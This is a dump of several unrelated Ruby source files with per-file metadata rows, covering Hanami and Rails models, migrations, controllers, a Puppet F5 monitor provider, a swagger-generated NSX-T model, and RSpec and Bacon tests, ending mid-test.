| 19.111111 | 85 | 0.651163 |
ff61a81562e12264a773e399080dad9d66a92c3d | 1,156 | # frozen_string_literal: true
require 'hanami/model'
require 'securerandom'
class User < Hanami::Entity
  GUEST_EMAIL = '[email protected]'
  GUEST_NAME = 'Guest User'
  GUEST_PROFILE = 'This is the Guest User. It can do nothing.'

  # True only when every identifying attribute carries the guest sentinel value.
  def guest?
    [name, email, profile] == [GUEST_NAME, GUEST_EMAIL, GUEST_PROFILE]
  end
end
class UserRepository < Hanami::Repository
  # Returns the single user whose name matches exactly, or nil.
  def find_by_name(name)
    users.where(name: name).map_to(User).one
  end

  # Returns the single user holding the given token, or nil.
  def find_by_token(token)
    users.where(token: token).map_to(User).one
  end

  # NOTE: TIL: `entity` is a `class_attribute` added to any class that inherits
  # from `Hanami::Repository` which, naturally enough, has the Class of
  # the Entity associated with that Repository. It turns hard-coded Entity
  # class names in client-repository code from a necessity into a smell.
  def self.guest_user
    # Memoised in-memory sentinel; id -1 cannot collide with persisted rows,
    # and the random password hash makes the account unusable for login.
    @guest_user ||= entity.new name: User::GUEST_NAME, email: User::GUEST_EMAIL,
                               password_hash: SecureRandom.alphanumeric(48),
                               profile: User::GUEST_PROFILE, id: -1
  end

  # Instance-level convenience wrapper around the class-level sentinel.
  def guest_user
    self.class.guest_user
  end
end
| 29.641026 | 80 | 0.682526 |
4adf54dee68c84fe89598068269a0095e2dc2010 | 1,614 | ###
# Copyright (c) 2015, Upnext Technologies Sp. z o.o.
# All rights reserved.
#
# This source code is licensed under the BSD 3-Clause License found in the
# LICENSE.txt file in the root directory of this source tree.
###
# Standard Devise-generated migration for the admins table; unused
# modules (reconfirmable, lockable) are left commented out below.
class DeviseCreateAdmins < ActiveRecord::Migration
  def change
    create_table(:admins) do |t|
      ## Database authenticatable
      t.string :email,              :null => false, :default => ""
      t.string :encrypted_password, :null => false, :default => ""

      ## Recoverable
      t.string   :reset_password_token
      t.datetime :reset_password_sent_at

      ## Rememberable
      t.datetime :remember_created_at

      ## Trackable
      t.integer  :sign_in_count, :default => 0, :null => false
      t.datetime :current_sign_in_at
      t.datetime :last_sign_in_at
      t.string   :current_sign_in_ip
      t.string   :last_sign_in_ip

      ## Confirmable
      t.string   :confirmation_token
      t.datetime :confirmed_at
      t.datetime :confirmation_sent_at
      # t.string   :unconfirmed_email # Only if using reconfirmable

      ## Lockable
      # t.integer  :failed_attempts, :default => 0, :null => false # Only if lock strategy is :failed_attempts
      # t.string   :unlock_token # Only if unlock strategy is :email or :both
      # t.datetime :locked_at

      t.timestamps null: false
    end

    add_index :admins, :email,                :unique => true
    add_index :admins, :reset_password_token, :unique => true
    add_index :admins, :confirmation_token,   :unique => true
    # add_index :admins, :unlock_token,         :unique => true
  end
end
| 32.28 | 110 | 0.651797 |
911cd18a22762917d948253b60aedbb8e4678373 | 202 | class CreateWegroups < ActiveRecord::Migration[5.1]
def change
create_table :wegroups do |t|
t.string :name
t.references :user, foreign_key: true
t.timestamps
end
end
end
| 18.363636 | 51 | 0.668317 |
62d08ce1a4ba47d07d6d5b9b7caadd983ba2f612 | 136 | # API for default State filter preferences
# Read-only endpoint backing the default State filter preferences.
class StatesController < ApplicationController
  # GET /states — exposes every State record for the filter UI.
  def index
    @states = State.all
  end
end
| 19.428571 | 46 | 0.772059 |
f87cc07ddc8b10ecb4d3edf3e155cc3fa5a1bf5e | 7,052 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
# NOTE: auto-generated by swagger-codegen from the NSX-T Policy OpenAPI
# spec; edits here will be lost on regeneration.
module NSXTPolicy
  # Traffic counters for IPSec VPN session.
  class IPSecVpnTrafficCounters
    # Total number of packets sent.
    attr_accessor :packets_out

    # Total number of outgoing packets dropped on outbound security association.
    attr_accessor :dropped_packets_out

    # Total number of bytes received.
    attr_accessor :bytes_in

    # Total number of bytes sent.
    attr_accessor :bytes_out

    # Total number of incoming packets dropped on inbound security association.
    attr_accessor :dropped_packets_in

    # Total number of packets received.
    attr_accessor :packets_in

    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        :'packets_out' => :'packets_out',
        :'dropped_packets_out' => :'dropped_packets_out',
        :'bytes_in' => :'bytes_in',
        :'bytes_out' => :'bytes_out',
        :'dropped_packets_in' => :'dropped_packets_in',
        :'packets_in' => :'packets_in'
      }
    end

    # Attribute type mapping.
    def self.swagger_types
      {
        :'packets_out' => :'Integer',
        :'dropped_packets_out' => :'Integer',
        :'bytes_in' => :'Integer',
        :'bytes_out' => :'Integer',
        :'dropped_packets_in' => :'Integer',
        :'packets_in' => :'Integer'
      }
    end

    # Initializes the object
    # @param [Hash] attributes Model attributes in the form of hash
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)

      # convert string to symbol for hash key
      attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }

      if attributes.has_key?(:'packets_out')
        self.packets_out = attributes[:'packets_out']
      end

      if attributes.has_key?(:'dropped_packets_out')
        self.dropped_packets_out = attributes[:'dropped_packets_out']
      end

      if attributes.has_key?(:'bytes_in')
        self.bytes_in = attributes[:'bytes_in']
      end

      if attributes.has_key?(:'bytes_out')
        self.bytes_out = attributes[:'bytes_out']
      end

      if attributes.has_key?(:'dropped_packets_in')
        self.dropped_packets_in = attributes[:'dropped_packets_in']
      end

      if attributes.has_key?(:'packets_in')
        self.packets_in = attributes[:'packets_in']
      end
    end

    # Show invalid properties with the reasons. Usually used together with valid?
    # @return Array for valid properties with the reasons
    def list_invalid_properties
      invalid_properties = Array.new
      invalid_properties
    end

    # Check to see if the all the properties in the model are valid
    # @return true if the model is valid
    def valid?
      true
    end

    # Checks equality by comparing each attribute.
    # @param [Object] Object to be compared
    def ==(o)
      return true if self.equal?(o)
      self.class == o.class &&
          packets_out == o.packets_out &&
          dropped_packets_out == o.dropped_packets_out &&
          bytes_in == o.bytes_in &&
          bytes_out == o.bytes_out &&
          dropped_packets_in == o.dropped_packets_in &&
          packets_in == o.packets_in
    end

    # @see the `==` method
    # @param [Object] Object to be compared
    def eql?(o)
      self == o
    end

    # Calculates hash code according to all attributes.
    # @return [Fixnum] Hash code
    def hash
      [packets_out, dropped_packets_out, bytes_in, bytes_out, dropped_packets_in, packets_in].hash
    end

    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)
      self.class.swagger_types.each_pair do |key, type|
        if type =~ /\AArray<(.*)>/i
          # check to ensure the input is an array given that the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
        end # or else data not found in attributes(hash), not an issue as the data can be optional
      end

      self
    end

    # Deserializes the data based on type
    # @param string type Data type
    # @param string value Value to be deserialized
    # @return [Object] Deserialized data
    def _deserialize(type, value)
      case type.to_sym
      when :DateTime
        DateTime.parse(value)
      when :Date
        Date.parse(value)
      when :String
        value.to_s
      when :Integer
        value.to_i
      when :Float
        value.to_f
      when :BOOLEAN
        if value.to_s =~ /\A(true|t|yes|y|1)\z/i
          true
        else
          false
        end
      when :Object
        # generic object (usually a Hash), return directly
        value
      when /\AArray<(?<inner_type>.+)>\z/
        inner_type = Regexp.last_match[:inner_type]
        value.map { |v| _deserialize(inner_type, v) }
      when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
        k_type = Regexp.last_match[:k_type]
        v_type = Regexp.last_match[:v_type]
        {}.tap do |hash|
          value.each do |k, v|
            hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
          end
        end
      else # model
        temp_model = NSXTPolicy.const_get(type).new
        temp_model.build_from_hash(value)
      end
    end

    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end

    # to_body is an alias to to_hash (backward compatibility)
    # @return [Hash] Returns the object in the form of hash
    def to_body
      to_hash
    end

    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = self.send(attr)
        next if value.nil?
        hash[param] = _to_hash(value)
      end
      hash
    end

    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map { |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
| 29.755274 | 107 | 0.626631 |
18119939ddf5bb580f352212af2e68a3fdb025ff | 3,286 | require File.join(File.dirname(__FILE__), '../f5')
require 'json'
# Puppet provider managing F5 "external" LTM monitors through the
# iControl REST API (/mgmt/tm/ltm/monitor/external).
Puppet::Type.type(:f5_monitor).provide(:external, parent: Puppet::Provider::F5) do
  has_feature :external

  def initialize(value={})
    super(value)
    @create_elements = false
  end

  # Discovers all external monitors on the device and maps each REST
  # object into provider property hashes.
  def self.instances
    instances = []
    monitors = Puppet::Provider::F5.call_items('/mgmt/tm/ltm/monitor/external')
    return [] if monitors.nil?

    monitors.each do |monitor|
      # destination is "address:port"; split into the two alias properties.
      aliasAddress, aliasServicePort = monitor['destination'].split(':')
      instances << new(
        ensure: :present,
        alias_address: aliasAddress,
        alias_service_port: aliasServicePort,
        parent_monitor: monitor['defaultsFrom'] || 'none',
        external_program: monitor['run'],
        arguments: monitor['args'],
        variables: monitor['apiRawValues'],
        description: monitor['description'],
        interval: monitor['interval'],
        name: monitor['fullPath'],
        manual_resume: monitor['manualResume'],
        time_until_up: monitor['timeUntilUp'],
        timeout: monitor['timeout'],
        up_interval: monitor['upInterval'],
      )
    end

    instances
  end

  # Pairs catalog resources with discovered instances by name.
  def self.prefetch(resources)
    nodes = instances
    resources.keys.each do |name|
      if provider = nodes.find { |node| node.name == name }
        resources[name].provider = provider
      end
    end
  end

  # Builds the JSON request body for create/flush from a resource or
  # property hash.
  def message(object)
    # Allows us to pass in resources and get all the attributes out
    # in the form of a hash.
    message = object.to_hash

    # Map for conversion in the message.
    map = {
      :'external-program' => :run,
      :arguments => :args,
      :variables => :apiRawValues,
      :'parent-monitor' => :defaultsFrom,
    }

    message.delete(:parent_monitor) if message[:parent_monitor] == "none"
    message = strip_nil_values(message)
    message = convert_underscores(message)
    message = rename_keys(map, message)
    message = create_message(basename, partition, message)
    message = string_to_integer(message)
    # alias address/port are folded into `destination`, then removed.
    message = destination_conversion(message)
    elements_to_strip = [:'alias-address', :'alias-service-port']
    message = strip_elements(message, elements_to_strip)

    message.to_json
  end

  # Pushes accumulated property changes to the device (no-op when the
  # property hash is empty, e.g. right after create).
  def flush
    if @property_hash != {}
      result = Puppet::Provider::F5.put("/mgmt/tm/ltm/monitor/external/#{api_name}", message(@property_hash))
    end
    return result
  end

  def exists?
    @property_hash[:ensure] == :present
  end

  def create
    @create_elements = true
    result = Puppet::Provider::F5.post("/mgmt/tm/ltm/monitor/external", message(resource))
    # We clear the hash here to stop flush from triggering.
    @property_hash.clear

    return result
  end

  def destroy
    result = Puppet::Provider::F5.delete("/mgmt/tm/ltm/monitor/external/#{api_name}")
    @property_hash.clear

    return result
  end

  mk_resource_methods

  # BIG-IP does not allow re-parenting an existing monitor, so reject it.
  def parent_monitor=(value)
    fail ArgumentError, "ERROR: Attempting to change `parent_monitor` from '#{self.provider.parent_monitor}' to '#{self[:parent_monitor]}'; cannot be modified after a monitor has been created."
  end
end
| 30.146789 | 193 | 0.632075 |
3902f249cf1d28a69b0787d048a964b90c6b56d1 | 3,672 | require 'test_helper'
class YamlTest < MiniTest::Spec
def self.yaml_representer(&block)
Module.new do
include Representable::YAML
instance_exec &block
end
end
def yaml_representer(&block)
self.class.yaml_representer(&block)
end
describe "property" do
let (:yaml) { yaml_representer do property :best_song end }
let (:album) { Album.new.tap do |album|
album.best_song = "Liar"
end }
describe "#to_yaml" do
it "renders plain property" do
album.extend(yaml).to_yaml.must_equal(
"---
best_song: Liar
")
end
it "always renders values into strings" do
Album.new.tap { |a| a.best_song = 8675309 }.extend(yaml).to_yaml.must_equal(
"---
best_song: 8675309
"
)
end
end
describe "#from_yaml" do
it "parses plain property" do
album.extend(yaml).from_yaml(
"---
best_song: This Song Is Recycled
").best_song.must_equal "This Song Is Recycled"
end
end
describe "with :class and :extend" do
yaml_song = yaml_representer do property :name end
let (:yaml_album) { Module.new do
include Representable::YAML
property :best_song, :extend => yaml_song, :class => Song
end }
let (:album) { Album.new.tap do |album|
album.best_song = Song.new("Liar")
end }
describe "#to_yaml" do
it "renders embedded typed property" do
album.extend(yaml_album).to_yaml.must_equal "---
best_song:
name: Liar
"
end
end
describe "#from_yaml" do
it "parses embedded typed property" do
album.extend(yaml_album).from_yaml("---
best_song:
name: Go With Me
").must_equal Album.new(nil,Song.new("Go With Me"))
end
end
end
end
describe "collection" do
let (:yaml) { yaml_representer do collection :songs end }
let (:album) { Album.new.tap do |album|
album.songs = ["Jackhammer", "Terrible Man"]
end }
describe "#to_yaml" do
it "renders a block style list per default" do
album.extend(yaml).to_yaml.must_equal "---
songs:
- Jackhammer
- Terrible Man
"
end
it "renders a flow style list when :style => :flow set" do
yaml = yaml_representer { collection :songs, :style => :flow }
album.extend(yaml).to_yaml.must_equal "---
songs: [Jackhammer, Terrible Man]
"
end
end
describe "#from_yaml" do
it "parses a block style list" do
album.extend(yaml).from_yaml("---
songs:
- Off Key Melody
- Sinking").must_equal Album.new(["Off Key Melody", "Sinking"])
end
it "parses a flow style list" do
album.extend(yaml).from_yaml("---
songs: [Off Key Melody, Sinking]").must_equal Album.new(["Off Key Melody", "Sinking"])
end
end
describe "with :class and :extend" do
let (:yaml_album) { Module.new do
include Representable::YAML
collection :songs, :class => Song do
property :name
property :track
end
end }
let (:album) { Album.new([Song.new("Liar", 1), Song.new("What I Know", 2)]) }
describe "#to_yaml" do
it "renders collection of typed property" do
album.extend(yaml_album).to_yaml.must_equal "---
songs:
- name: Liar
track: 1
- name: What I Know
track: 2
"
end
end
describe "#from_yaml" do
it "parses collection of typed property" do
album.extend(yaml_album).from_yaml("---
songs:
- name: One Shot Deal
track: 4
- name: Three Way Dance
track: 5").must_equal Album.new([Song.new("One Shot Deal", 4), Song.new("Three Way Dance", 5)])
end
end
end
end
end | 22.666667 | 97 | 0.615741 |
1a5071aa5fbcda701f07688b9ffa54d78090eeec | 793 | describe UseCases::Administrator::FormatEmailDomainsList do
let(:result) { subject.execute(email_domains) }
context "with no email domains" do
let(:email_domains) { [] }
it "creates no whitelist" do
expect(result.read).to eq("--- []\n")
end
it "returns an IO object" do
expect(result).to be_an_instance_of(StringIO)
end
end
context "when one email domain is added" do
let(:email_domains) { ["gov.uk"] }
it "creates a whitelist with one entry" do
expect(result.read).to eq("---\n- gov.uk\n")
end
end
context "when two email domains are added" do
let(:email_domains) { ["gov.uk", "made.eu"] }
it "creates a whitelist with two entries" do
expect(result.read).to eq("---\n- gov.uk\n- made.eu\n")
end
end
end
| 24.78125 | 61 | 0.638083 |
ff887851ea8e4f8bfb37a508d94c3cc97026a7d4 | 273 | module ToSelect
module Array
def to_select(text_method = :name, options = {})
list = self.map { |x| [x.send(text_method), x.id] }
list.unshift [options[:default], nil] if options[:default]
list
end
end
end
Array.send :include, ToSelect::Array
| 24.818182 | 64 | 0.644689 |
08bbf265bb6b525ad0bd9b3bebde8711b70d153d | 94 | require 'rspec'
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: false)
| 18.8 | 52 | 0.819149 |
ffc27d07d69fa4f1540499092761aaddfb441529 | 2,970 | require 'github_api'
require 'net/http'
# Controller driving DNN training experiments built on top of GitHub
# branches: renders upstream rounds / downstream branch choices, rewrites
# Dockerfiles to point at a chosen upstream image, and records experiments.
class GgithubsController < ApplicationController
  skip_before_action :verify_authenticity_token

  # Lists recent upstream rounds and, when a repo is selected, the
  # downstream branches of twgo/DNN-test minus the configured hidden ones.
  # Also previews the Dockerfile with its FROM line retargeted at the
  # requested upstream image tag.
  def index
    # Rates 888/999 are excluded from the listing (sentinel values).
    @upstream = Round.where(repo: 'DNN-train').where.not(rate: [888, 999]).order(id: :desc) || Round.none
    # BUG FIX: the original used `=` (assignment), which always evaluated
    # truthy and clobbered params[:select_repo]; `==` is what was intended.
    if params[:select_repo] == 'true'
      origin_downstreams = get_branches "twgo/DNN-test"
      hidden_branches = Rails.configuration.my_hidden_branches
      @downstreams = origin_downstreams.select{ |b| (hidden_branches.exclude? b[:down_name]) }
    end
    origin_code = get_dockerfile(params[:repo], params[:sha])
    repo_ver = 'dnn-train:'
    # Rewrite the FROM line to reference the chosen upstream image tag;
    # leave the Dockerfile untouched when no upstream is given.
    # (The original's `[0..-1]` slice after split was a no-op and is dropped.)
    @github_code = params[:upstream].blank? ? origin_code : origin_code.split("\n").map{ |x|
      if x.include?(repo_ver)
        "FROM dockerhub.iis.sinica.edu.tw/#{repo_ver}#{params[:upstream].split('/')[-1]}"
      else
        x
      end
    }.join("\n")
    if params[:downstream]
      # The branch name is encoded before the 'oooo' separator.
      @round_in_history = Round.where(id: DownStream.where(branch: params[:downstream].split('oooo')[0]).pluck(:round_id)).order(id: :desc)
    end
  end

  # Persists a new experiment from the submitted Dockerfile contents.
  def update
    Exp.create(
      upstream: params[:github_code][:upstream],
      upstream_info: params[:github_code][:upstream_info],
      repo: params[:github_code][:repo],
      branch: params[:github_code][:branch],
      content: params[:github_code][:content],
      sha: params[:github_code][:sha],
      status: 'added'
    )
    redirect_to ggithubs_path(select_down: 'yes'), notice: "實驗已建立!"
  end

  # Pushes an experiment run to GitHub: creates a temporary branch off
  # `sha`, commits the rewritten Dockerfile there, then deletes the branch.
  # The sleep gives GitHub time to register the commit before deletion.
  def create_exp_on_github upstream_info, repo, branch, content, sha
    temp_branch = "_#{branch}"
    create_branch(repo, temp_branch, sha)
    message = "EXP RUN: #{upstream_info}"
    github_contents = Github::Client::Repos::Contents.new oauth_token: ENV['GITHUB_TOKEN']
    file = github_contents.get 'twgo', repo, 'Dockerfile', ref: branch
    github_contents.update('twgo', repo, 'Dockerfile',
      path: 'Dockerfile',
      branch: temp_branch,
      message: message,
      content: content,
      sha: file.sha,
    )
    sleep 3
    delete_branch(repo, temp_branch)
  end

  private

  # Fetches the raw Dockerfile for repo@sha from raw.githubusercontent.com.
  def get_dockerfile repo, sha
    url = "https://raw.githubusercontent.com/twgo/#{repo}/#{sha}/Dockerfile"
    # FIX: URI.encode/URI.unescape were removed in Ruby 3.0 and the old
    # encode-then-unescape round trip was a no-op for well-formed repo/sha
    # values, so parse the URL directly.
    Net::HTTP.get(URI.parse(url)).force_encoding("UTF-8")
  end

  # Returns [{down_name:, down_sha:}, ...] for every branch of org_repo.
  def get_branches org_repo
    github_client = Octokit::Client.new(login: ENV['GITHUB_ID'] , password: ENV['GITHUB_SECRET'], per_page: 200)
    github_client.branches(org_repo).map{ |x| {
      down_name: x[:name],
      down_sha: x[:commit][:sha],
    }}
  end

  # Creates heads/<temp_branch> in twgo/<repo> pointing at sha.
  def create_branch repo, temp_branch, sha
    github_client = Octokit::Client.new(login: ENV['GITHUB_ID'] , password: ENV['GITHUB_SECRET'])
    github_client.create_ref "twgo/#{repo}", "heads/#{temp_branch}", sha
  end

  # Removes heads/<temp_branch> from twgo/<repo>.
  def delete_branch repo, temp_branch
    github_client = Octokit::Client.new(login: ENV['GITHUB_ID'] , password: ENV['GITHUB_SECRET'])
    github_client.delete_ref "twgo/#{repo}", "heads/#{temp_branch}"
  end
end
| 33.370787 | 139 | 0.673401 |
1abd9ccc4f0db5e8e1e297dfc2fd98fdb544a3e2 | 9,749 | # frozen_string_literal: true
require 'spec_helper'
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: true)
describe Bosh::AzureCloud::AzureClient do
let(:logger) { Bosh::Clouds::Config.logger }
let(:azure_client) do
Bosh::AzureCloud::AzureClient.new(
mock_azure_config,
logger
)
end
let(:subscription_id) { mock_azure_config.subscription_id }
let(:tenant_id) { mock_azure_config.tenant_id }
let(:token_api_version) { AZURE_API_VERSION }
let(:token_uri) { "https://login.microsoftonline.com/#{tenant_id}/oauth2/token?api-version=#{token_api_version}" }
let(:valid_access_token) { 'valid-access-token' }
let(:expires_on) { (Time.new + 1800).to_i.to_s }
let(:storage_api_version) { AZURE_RESOURCE_PROVIDER_STORAGE }
let(:storage_account_name) { 'fake-storage-account-name' }
let(:location) { 'fake-location' }
let(:sku) { 'Standard_LRS' }
let(:kind) { 'StorageV2' }
let(:tags) { { 'foo' => 'bar' } }
let(:request_id) { 'fake-request-id' }
let(:operation_status_link) { "https://management.azure.com/subscriptions/#{subscription_id}/operations/#{request_id}" }
describe '#create_storage_account' do
let(:storage_account_uri) { "https://management.azure.com/subscriptions/#{subscription_id}/resourceGroups/#{MOCK_RESOURCE_GROUP_NAME}/providers/Microsoft.Storage/storageAccounts/#{storage_account_name}?api-version=#{storage_api_version}" }
let(:request_body) do
{
location: location,
sku: {
name: sku
},
kind: kind,
tags: tags
}
end
context 'when the response status code is 200' do
it 'should create the storage account without errors' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 200,
body: '',
headers: {}
)
expect(
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
).to be(true)
end
end
context 'when the response status code is neither 200 nor 202' do
it 'should raise an error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 404,
body: '',
headers: {}
)
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(/create_storage_account - Cannot create the storage account '#{storage_account_name}'. http code: 404/)
end
end
context 'when the response status code is 202' do
let(:default_retry_after) { 10 }
context 'when the status code of the response to the asynchronous operation is 200' do
context 'when the provisioning state is Succeeded' do
it 'should create the storage account without errors' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after)
expect(
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
).to be(true)
end
end
context 'when the provisioning state is Failed' do
context 'when there is no Retry-After in the response header' do
it 'should raise an error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Failed"}',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after)
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(/Error message: {"status":"Failed"}/)
end
end
context 'when there is Retry-After in the response header' do
context 'retry succeed' do
it 'should create the storage account after retry' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
{
status: 200,
body: '{"status":"Failed"}',
headers: {
'Retry-After' => '1'
}
},
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after).exactly(2).times
expect(azure_client).to receive(:sleep).with(1).exactly(1).times
expect(
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
).to be(true)
end
end
context 'retry failed' do
it 'should get one exception' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
eleven_failed = []
11.times do
eleven_failed.push(
status: 200,
body: '{"status":"Failed"}',
headers: {
'Retry-After' => '1'
}
)
end
stub_request(:get, operation_status_link).to_return(
eleven_failed
)
expect(azure_client).to receive(:sleep).with(default_retry_after).exactly(11).times
expect(azure_client).to receive(:sleep).with(1).exactly(11).times
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(Bosh::AzureCloud::AzureAsynInternalError, /create_storage_account - http code: 200/)
end
end
end
end
end
context 'when the status code of the response to the asynchronous operation is not one of 200 and 202' do
it 'should raise an error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 404,
body: 'fake-response-body',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after)
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(/create_storage_account - http code: 404. Error message: fake-response-body/)
end
end
end
end
end
| 36.376866 | 243 | 0.535747 |
1ab96c63f068c37d23a6c2701e35e275b49e1719 | 7,295 | require File.expand_path('../../../../../helper', __FILE__)
describe 'Sections::Controller::Revisions' do
behaves_like :capybara
textbox_id = CustomFields::Model::CustomFieldType[:name => 'textbox'].id
checkbox_id = CustomFields::Model::CustomFieldType[:name => 'checkbox'].id
section = Sections::Model::Section.create(
:name => 'Spec section',
:comment_allow => true,
:comment_require_account => true,
:comment_moderate => true,
:comment_format => 'plain'
)
group = CustomFields::Model::CustomFieldGroup.create(:name => 'Spec fields')
field = CustomFields::Model::CustomField.create(
:name => 'Spec field',
:sort_order => 0,
:format => 'markdown',
:required => true,
:text_editor => false,
:custom_field_group_id => group.id,
:custom_field_type_id => textbox_id
)
field_1 = CustomFields::Model::CustomField.create(
:name => 'Spec checkbox',
:sort_order => 1,
:format => 'plain',
:required => true,
:text_editor => false,
:custom_field_group_id => group.id,
:custom_field_type_id => checkbox_id,
:possible_values => "Yorick Peterse|yorick\nChuck Norris|chuck"
)
section.custom_field_group_pks = [group.id]
entries_url = Sections::Controller::SectionEntries.r(:index, section.id).to_s
edit_url = Sections::Controller::SectionEntries.r(:edit, section.id).to_s
revisions_url = lang('revisions.titles.index')
restore_url = lang('revisions.labels.restore')
new_button = lang('section_entries.buttons.new')
save_button = lang('section_entries.buttons.save')
compare_button = lang('revisions.buttons.compare')
title_field = lang('section_entries.labels.title')
it 'Create a new revision each time a section entry is saved' do
visit(entries_url)
click_on(new_button)
within '#section_entry_form' do
fill_in(title_field, :with => 'Entry with revisions')
fill_in(field.name, :with => 'Original value')
check("form_custom_field_value_#{field_1.id}_0")
click_on(save_button)
end
current_path.should =~ /#{edit_url}\/[0-9]+/
page.has_selector?('.message.error').should == false
9.times do |number|
within '#section_entry_form' do
fill_in(field.name, :with => "Modified #{number}")
click_on(save_button)
end
end
page.find_field(field.name).value.should == 'Modified 8'
Sections::Model::SectionEntry[:title => 'Entry with revisions'] \
.revisions.length.should == 10
end
it 'Compare two different revisions' do
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
url = Sections::Controller::Revisions \
.r(:index, entry.section_id, entry.id) \
.to_s
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
visit(entries_url)
click_on(revisions_url)
page.current_path.should == url
page.all('table tbody tr').count.should == 10
choose("old_revision_id_#{revisions[0].id}")
choose("new_revision_id_#{revisions[1].id}")
click_on(compare_button)
page.has_selector?('.diff').should == true
page.has_selector?('.diff .ins').should == true
page.has_selector?('.diff .del').should == true
page.has_selector?('.diff .line_number').should == true
page.has_content?('Original value').should == true
page.has_content?('Modified 0').should == true
page.find('.diff .del').text.strip.should == '-Original value'
page.find('.diff .ins').text.strip.should == '+Modified 0'
choose("old_revision_id_#{revisions[1].id}")
choose("new_revision_id_#{revisions[2].id}")
click_on(compare_button)
page.find('.diff .del').text.strip.should == '-Modified 0'
page.find('.diff .ins').text.strip.should == '+Modified 1'
end
it 'Compare the same two revisions' do
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
url = Sections::Controller::Revisions \
.r(:index, entry.section_id, entry.id) \
.to_s
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
visit(entries_url)
click_on(revisions_url)
page.current_path.should == url
page.all('table tbody tr').count.should == 10
choose("old_revision_id_#{revisions[0].id}")
choose("new_revision_id_#{revisions[0].id}")
click_on(compare_button)
page.has_selector?('.diff').should == false
page.has_content?(lang('revisions.messages.no_differences')).should == true
end
it 'The oldest revision should be removed if the limit is exceeded' do
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
oldest = entry.revisions[-1].id
visit(entries_url)
click_on('Entry with revisions')
5.times do |number|
within '#section_entry_form' do
fill_in(field.name, :with => "Overwritten #{number}")
click_on(save_button)
end
end
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
